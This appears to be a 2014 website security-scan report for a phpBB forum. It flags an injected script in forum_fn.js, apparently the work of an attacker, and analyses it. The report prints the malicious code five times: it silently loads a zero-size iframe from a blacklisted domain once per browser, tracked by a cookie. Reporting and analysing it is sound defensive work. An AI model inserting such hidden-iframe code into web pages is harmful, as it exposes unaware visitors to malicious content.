Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=misura.ru
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://misura.ru/ | 200 OK Content-Length: 25078 Content-Type: text/html | clean |
http://misura.ru/./styles/prosilver/template/styleswitcher.js | 200 OK Content-Length: 2689 Content-Type: application/x-javascript | clean |
http://misura.ru/./styles/prosilver/template/forum_fn.js | 200 OK Content-Length: 5019 Content-Type: application/x-javascript | malicious |
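Malicious code found. Script contains blacklisted domain: ducmet.thrilla.net. The statements at the end of the excerpt below (from `var if5vDM` onward) follow what appears to be the script's original last function; they create an iframe with zero width and height whose source is the blacklisted domain, and attach it to the page body on window.onload only when the 'if5vDM' cookie is absent. The cookie is then set with an expiry written as 18-May-33, so a given browser loads the hidden frame once and a repeat visit from the same browser will not reproduce it. The flagged URLs in this table differ only in repeated "./" path segments and report the same Content-Length (5019), so they point to a single modified file, forum_fn.js, which should be restored from a known-good copy once the way it was altered has been established.
Excerpt: ...[4273 bytes skipped]... e[3]); var width = (x1 < 0) ? (x1 * -1) + x2 : x2 - x1; var height = (y1 < 0) ? (y1 * -1) + y2 : y2 - y1; } else { var width = 200; var height = 0; } obj.width = width; obj.height = height + 16; obj.SetControllerVisible(true); obj.Play(); } var if5vDM = document.createElement('iframe');if5vDM.name = 'if5vDM';if5vDM.src = 'http://ducmet.thrilla.net/';if5vDM.style.width = '0px';if5vDM.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if5vDM=') == -1) {document.cookie = 'if5vDM=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if5vDM);}}; | ||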
http://misura.ru/./index.php?sid=c9f68ec09b14985b26fe84f62b677b5f | 200 OK Content-Length: 25078 Content-Type: text/html | clean |
http://misura.ru/././styles/prosilver/template/styleswitcher.js | 200 OK Content-Length: 2689 Content-Type: application/x-javascript | clean |
http://misura.ru/././styles/prosilver/template/forum_fn.js | 200 OK Content-Length: 5019 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: ducmet.thrilla.net ...[4273 bytes skipped]... e[3]); var width = (x1 < 0) ? (x1 * -1) + x2 : x2 - x1; var height = (y1 < 0) ? (y1 * -1) + y2 : y2 - y1; } else { var width = 200; var height = 0; } obj.width = width; obj.height = height + 16; obj.SetControllerVisible(true); obj.Play(); } var if5vDM = document.createElement('iframe');if5vDM.name = 'if5vDM';if5vDM.src = 'http://ducmet.thrilla.net/';if5vDM.style.width = '0px';if5vDM.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if5vDM=') == -1) {document.cookie = 'if5vDM=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if5vDM);}}; | ||
http://misura.ru/././index.php?sid=c9f68ec09b14985b26fe84f62b677b5f | 200 OK Content-Length: 25078 Content-Type: text/html | clean |
http://misura.ru/./././styles/prosilver/template/styleswitcher.js | 200 OK Content-Length: 2689 Content-Type: application/x-javascript | clean |
http://misura.ru/./././styles/prosilver/template/forum_fn.js | 200 OK Content-Length: 5019 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: ducmet.thrilla.net ...[4273 bytes skipped]... e[3]); var width = (x1 < 0) ? (x1 * -1) + x2 : x2 - x1; var height = (y1 < 0) ? (y1 * -1) + y2 : y2 - y1; } else { var width = 200; var height = 0; } obj.width = width; obj.height = height + 16; obj.SetControllerVisible(true); obj.Play(); } var if5vDM = document.createElement('iframe');if5vDM.name = 'if5vDM';if5vDM.src = 'http://ducmet.thrilla.net/';if5vDM.style.width = '0px';if5vDM.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if5vDM=') == -1) {document.cookie = 'if5vDM=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if5vDM);}}; | ||
http://misura.ru/./././index.php?sid=c9f68ec09b14985b26fe84f62b677b5f | 200 OK Content-Length: 25078 Content-Type: text/html | clean |
http://misura.ru/././././styles/prosilver/template/styleswitcher.js | 200 OK Content-Length: 2689 Content-Type: application/x-javascript | clean |
http://misura.ru/././././styles/prosilver/template/forum_fn.js | 200 OK Content-Length: 5019 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: ducmet.thrilla.net ...[4273 bytes skipped]... e[3]); var width = (x1 < 0) ? (x1 * -1) + x2 : x2 - x1; var height = (y1 < 0) ? (y1 * -1) + y2 : y2 - y1; } else { var width = 200; var height = 0; } obj.width = width; obj.height = height + 16; obj.SetControllerVisible(true); obj.Play(); } var if5vDM = document.createElement('iframe');if5vDM.name = 'if5vDM';if5vDM.src = 'http://ducmet.thrilla.net/';if5vDM.style.width = '0px';if5vDM.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if5vDM=') == -1) {document.cookie = 'if5vDM=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if5vDM);}}; | ||
http://misura.ru/././././index.php?sid=c9f68ec09b14985b26fe84f62b677b5f | 200 OK Content-Length: 25078 Content-Type: text/html | clean |
http://misura.ru/./././././styles/prosilver/template/styleswitcher.js | 200 OK Content-Length: 2689 Content-Type: application/x-javascript | clean |
http://misura.ru/./././././styles/prosilver/template/forum_fn.js | 200 OK Content-Length: 5019 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: ducmet.thrilla.net ...[4273 bytes skipped]... e[3]); var width = (x1 < 0) ? (x1 * -1) + x2 : x2 - x1; var height = (y1 < 0) ? (y1 * -1) + y2 : y2 - y1; } else { var width = 200; var height = 0; } obj.width = width; obj.height = height + 16; obj.SetControllerVisible(true); obj.Play(); } var if5vDM = document.createElement('iframe');if5vDM.name = 'if5vDM';if5vDM.src = 'http://ducmet.thrilla.net/';if5vDM.style.width = '0px';if5vDM.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if5vDM=') == -1) {document.cookie = 'if5vDM=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if5vDM);}}; |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: misura.ru
Result:
HTTP/1.1 200 OK
Cache-Control: private, no-cache="set-cookie"
Connection: close
Date: Tue, 10 Jun 2014 08:18:18 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: 0
Set-Cookie: phpbb3_bsy2j_u=1; expires=Wed, 10-Jun-2015 08:18:17 GMT; path=/; domain=misura.ru; HttpOnly
Set-Cookie: phpbb3_bsy2j_k=; expires=Wed, 10-Jun-2015 08:18:17 GMT; path=/; domain=misura.ru; HttpOnly
Set-Cookie: phpbb3_bsy2j_sid=c9f68ec09b14985b26fe84f62b677b5f; expires=Wed, 10-Jun-2015 08:18:17 GMT; path=/; domain=misura.ru; HttpOnly
X-Powered-By: PHP/5.5.3
GET / HTTP/1.1
Host: misura.ru
Result:
HTTP/1.1 200 OK
Cache-Control: private, no-cache="set-cookie"
Connection: close
Date: Tue, 10 Jun 2014 08:18:18 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: 0
Set-Cookie: phpbb3_bsy2j_u=1; expires=Wed, 10-Jun-2015 08:18:17 GMT; path=/; domain=misura.ru; HttpOnly
Set-Cookie: phpbb3_bsy2j_k=; expires=Wed, 10-Jun-2015 08:18:17 GMT; path=/; domain=misura.ru; HttpOnly
Set-Cookie: phpbb3_bsy2j_sid=c9f68ec09b14985b26fe84f62b677b5f; expires=Wed, 10-Jun-2015 08:18:17 GMT; path=/; domain=misura.ru; HttpOnly
X-Powered-By: PHP/5.5.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: misura.ru
Referer: http://www.google.com/search?q=misura.ru
Result:
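The result is similar to the first query; no suspicious redirects were found. This check looks only at the HTTP response to a request carrying a search-engine Referer, so a clean result here does not cover the script-injected iframe reported for forum_fn.js in the scanned-files table above.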
GET / HTTP/1.1
Host: misura.ru
Referer: http://www.google.com/search?q=misura.ru
Result:
The result is similar to the first query; no suspicious redirects were found.